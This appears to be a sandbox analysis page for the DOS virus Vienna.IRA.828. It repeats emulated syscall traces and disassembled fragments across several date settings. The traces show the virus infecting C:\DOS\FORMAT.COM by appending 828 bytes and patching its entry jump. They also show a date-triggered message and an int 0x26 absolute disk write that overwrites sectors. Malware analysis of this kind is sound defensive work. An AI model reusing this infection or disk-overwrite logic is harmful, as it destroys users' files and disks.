Sample viewer

vx.netlux.org/Virus.DOS.Vienna.IRA.828

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:28:06.880226572Z 255 PC: 12a5e | UNKNOWN!
2018-12-17T22:28:06.881259399Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a
0x12a71: jge 0x12a76
0x12a73: jmp 0x12ad0
0x12a75: nop
0x12a76: mov ah, 0x2a
0x12a78: int 0x21
0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
2018-12-17T22:28:06.884032024Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
0x12a97: mov ah, 0x2d
0x12a99: mov cl, 1
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
2018-12-17T22:28:06.886490494Z 9 PC: 12ab2 | Display string (String= ' The I.R.Army lives....... ')
2018-12-17T22:28:06.890852842Z 47 PC: 12ad5 | Get disk transfer address
2018-12-17T22:28:06.892936542Z 26 PC: 12ae8 | Set disk transfer address
2018-12-17T22:28:06.893951498Z 78 PC: 12b78 | Find first file
2018-12-17T22:28:06.897766624Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.902585905Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.905295343Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.907996738Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.911324008Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.914032767Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.916716082Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.919937465Z 78 PC: 12b78 | Find first file
2018-12-17T22:28:06.929823622Z 79 PC: 12b7e | Find next file
2018-12-17T22:28:06.933109311Z 67 PC: 12bb7 | Get or set file attributes
2018-12-17T22:28:06.94122504Z 67 PC: 12bc9 | Get or set file attributes
2018-12-17T22:28:07.288465516Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-17T22:28:07.296206572Z 87 PC: 12be0 | Get or set file date and time
2018-12-17T22:28:07.298248038Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si
0x12bf7: int 0x21
0x12bf9: jb 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51
0x12c00: mov ax, 0x4202
0x12c03: mov cx, 0
0x12c06: mov dx, 0
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax
0x12c15: nop
0x12c16: add cx, 0x354
0x12c1a: mov di, si
2018-12-17T22:28:07.300563382Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:28:07.306731177Z 66 PC: 12c0b | Move file pointer
2018-12-17T22:28:07.308496475Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-17T22:28:07.316938186Z 66 PC: 12c42 | Move file pointer
2018-12-17T22:28:07.318437675Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:28:07.32146553Z 87 PC: 12c64 | Get or set file date and time
2018-12-17T22:28:07.323421233Z 62 PC: 12c68 | Close file
2018-12-17T22:28:07.330423705Z 67 PC: 12c77 | Get or set file attributes
2018-12-17T22:28:07.344365554Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.606783963Z 255 PC: 12a5e | UNKNOWN!
2018-12-25T11:53:27.608898289Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a
0x12a71: jge 0x12a76
0x12a73: jmp 0x12ad0
0x12a75: nop
0x12a76: mov ah, 0x2a
0x12a78: int 0x21
0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
2018-12-25T11:53:27.611336865Z 43 PC: 12a97 | Set date
2018-12-25T11:53:27.614828479Z 45 PC: 12a9d | Set time
2018-12-25T11:53:27.61853727Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
0x12aa6: jmp 0x12a76
0x12aa8: mov ah, 9
0x12aaa: mov dx, si
0x12aac: add dx, 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0
0x12ab9: pushf
0x12aba: mov al, byte ptr [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100
0x12ac1: mov dx, 0
0x12ac4: mov bx, 1
0x12ac7: int 0x26
2018-12-25T11:53:27.620622619Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
0x12a97: mov ah, 0x2d
0x12a99: mov cl, 1
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
2018-12-25T11:53:27.622658044Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.626347401Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.627806845Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.64017149Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.642756644Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.654962084Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.657386268Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.659738049Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.662224514Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.664518078Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.6675372Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.676955696Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.679846282Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.686692176Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:28.344620205Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:28.351332553Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T11:53:28.352710963Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si
0x12bf7: int 0x21
0x12bf9: jb 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51
0x12c00: mov ax, 0x4202
0x12c03: mov cx, 0
0x12c06: mov dx, 0
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax
0x12c15: nop
0x12c16: add cx, 0x354
0x12c1a: mov di, si
2018-12-25T11:53:28.355983737Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:28.361344946Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:28.362973378Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:28.371543658Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:28.372886882Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:28.375587663Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:28.377614677Z 62 PC: 12c68 | Close file
2018-12-25T11:53:28.384839677Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:28.394333125Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.631506224Z 255 PC: 12a5e | UNKNOWN!
2018-12-25T11:53:27.632693915Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a
0x12a71: jge 0x12a76
0x12a73: jmp 0x12ad0
0x12a75: nop
0x12a76: mov ah, 0x2a
0x12a78: int 0x21
0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
2018-12-25T11:53:27.63581881Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
0x12aa6: jmp 0x12a76
0x12aa8: mov ah, 9
0x12aaa: mov dx, si
0x12aac: add dx, 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0
0x12ab9: pushf
0x12aba: mov al, byte ptr [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100
0x12ac1: mov dx, 0
0x12ac4: mov bx, 1
0x12ac7: int 0x26
2018-12-25T11:53:27.639321394Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.640949275Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.643125117Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.649871929Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.652853306Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.656856983Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.659641848Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.662565136Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.666010716Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.66922141Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.671997364Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.683067078Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.685442042Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.689444675Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:28.043991553Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:28.053773655Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T11:53:28.055789482Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si
0x12bf7: int 0x21
0x12bf9: jb 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51
0x12c00: mov ax, 0x4202
0x12c03: mov cx, 0
0x12c06: mov dx, 0
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax
0x12c15: nop
0x12c16: add cx, 0x354
0x12c1a: mov di, si
2018-12-25T11:53:28.058869103Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:28.067629302Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:28.069698836Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:28.507540798Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:28.514520702Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:28.519105151Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:28.523749878Z 62 PC: 12c68 | Close file
2018-12-25T11:53:28.684081996Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:28.905476251Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.783447893Z 255 PC: 12a5e | UNKNOWN!
2018-12-25T11:53:27.785423866Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a
0x12a71: jge 0x12a76
0x12a73: jmp 0x12ad0
0x12a75: nop
0x12a76: mov ah, 0x2a
0x12a78: int 0x21
0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
2018-12-25T11:53:27.787463497Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
0x12a97: mov ah, 0x2d
0x12a99: mov cl, 1
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
2018-12-25T11:53:27.789449171Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.7980767Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.799384537Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.805420759Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.809370581Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.811782381Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.814155792Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.817508649Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.81997965Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.822458248Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.825086022Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.838306678Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.841338577Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.847245251Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:28.344606725Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:28.351338219Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T11:53:28.352710411Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si
0x12bf7: int 0x21
0x12bf9: jb 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51
0x12c00: mov ax, 0x4202
0x12c03: mov cx, 0
0x12c06: mov dx, 0
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax
0x12c15: nop
0x12c16: add cx, 0x354
0x12c1a: mov di, si
2018-12-25T11:53:28.355728391Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:28.36101474Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:28.362312689Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:28.3737356Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:28.375050156Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:28.392730251Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:28.397421032Z 62 PC: 12c68 | Close file
2018-12-25T11:53:28.403852778Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:28.413687403Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.89434639Z 255 PC: 12a5e | UNKNOWN!
2018-12-25T11:53:27.896533568Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a
0x12a71: jge 0x12a76
0x12a73: jmp 0x12ad0
0x12a75: nop
0x12a76: mov ah, 0x2a
0x12a78: int 0x21
0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
2018-12-25T11:53:27.899195803Z 43 PC: 12a97 | Set date
2018-12-25T11:53:27.903131512Z 45 PC: 12a9d | Set time
2018-12-25T11:53:27.906684858Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
0x12aa6: jmp 0x12a76
0x12aa8: mov ah, 9
0x12aaa: mov dx, si
0x12aac: add dx, 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0
0x12ab9: pushf
0x12aba: mov al, byte ptr [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100
0x12ac1: mov dx, 0
0x12ac4: mov bx, 1
0x12ac7: int 0x26
2018-12-25T11:53:27.909850532Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
0x12a97: mov ah, 0x2d
0x12a99: mov cl, 1
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
2018-12-25T11:53:27.91241912Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.914339714Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.916695514Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.930131469Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.933216323Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.937113028Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.940904016Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.944175565Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.948166585Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.951709371Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.954994657Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.980037536Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.983811207Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.990725695Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:29.044740793Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:29.05353534Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T11:53:29.055390302Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si
0x12bf7: int 0x21
0x12bf9: jb 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51
0x12c00: mov ax, 0x4202
0x12c03: mov cx, 0
0x12c06: mov dx, 0
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax
0x12c15: nop
0x12c16: add cx, 0x354
0x12c1a: mov di, si
2018-12-25T11:53:29.057958762Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:29.066097306Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:29.067739115Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:29.076585698Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:29.084557726Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:29.087957825Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:29.090026665Z 62 PC: 12c68 | Close file
2018-12-25T11:53:29.09939707Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:29.113577384Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":8,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:27.896137079Z 255 PC: 12a5e | UNKNOWN!
2018-12-25T11:53:27.902726509Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a
0x12a71: jge 0x12a76
0x12a73: jmp 0x12ad0
0x12a75: nop
0x12a76: mov ah, 0x2a
0x12a78: int 0x21
0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
2018-12-25T11:53:27.905421272Z 43 PC: 12a97 | Set date
2018-12-25T11:53:27.909451832Z 45 PC: 12a9d | Set time
2018-12-25T11:53:27.913434809Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
0x12aa6: jmp 0x12a76
0x12aa8: mov ah, 9
0x12aaa: mov dx, si
0x12aac: add dx, 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0
0x12ab9: pushf
0x12aba: mov al, byte ptr [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100
0x12ac1: mov dx, 0
0x12ac4: mov bx, 1
0x12ac7: int 0x26
2018-12-25T11:53:27.917147213Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
0x12a97: mov ah, 0x2d
0x12a99: mov cl, 1
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
2018-12-25T11:53:27.919742957Z 9 PC: 12ab2 | Display string (String= ' The I.R.Army lives....... ')
2018-12-25T11:53:27.9263914Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:27.928507399Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:27.929789566Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:27.942229553Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:27.945995454Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.94898796Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.95227335Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.956563958Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.959411132Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.962236814Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.966319395Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:27.982088685Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:27.985526617Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:27.992802988Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:29.044712136Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:29.049495434Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T11:53:29.051264047Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si
0x12bf7: int 0x21
0x12bf9: jb 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51
0x12c00: mov ax, 0x4202
0x12c03: mov cx, 0
0x12c06: mov dx, 0
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax
0x12c15: nop
0x12c16: add cx, 0x354
0x12c1a: mov di, si
2018-12-25T11:53:29.062042118Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:29.068204719Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:29.070051818Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:29.07869573Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:29.080310461Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:29.083651572Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:29.08752379Z 62 PC: 12c68 | Close file
2018-12-25T11:53:29.094719705Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:29.106877112Z 26 PC: 12c84 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5011,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:28.09787686Z 255 PC: 12a5e | UNKNOWN!
2018-12-25T11:53:28.099595962Z 42 PC: 12a6b | Get date 0x12a6b: cmp cx, 0x7c9
0x12a6f: jb 0x12a8a
0x12a71: jge 0x12a76
0x12a73: jmp 0x12ad0
0x12a75: nop
0x12a76: mov ah, 0x2a
0x12a78: int 0x21
0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
2018-12-25T11:53:28.102312928Z 43 PC: 12a97 | Set date
2018-12-25T11:53:28.106536753Z 45 PC: 12a9d | Set time
2018-12-25T11:53:28.109750695Z 44 PC: 12aa1 | Get time 0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
0x12aa6: jmp 0x12a76
0x12aa8: mov ah, 9
0x12aaa: mov dx, si
0x12aac: add dx, 0x41
0x12aaf: nop
0x12ab0: int 0x21
0x12ab2: cmp byte ptr [si], 0x1a
0x12ab5: nop
0x12ab6: nop
0x12ab7: ja 0x12ad0
0x12ab9: pushf
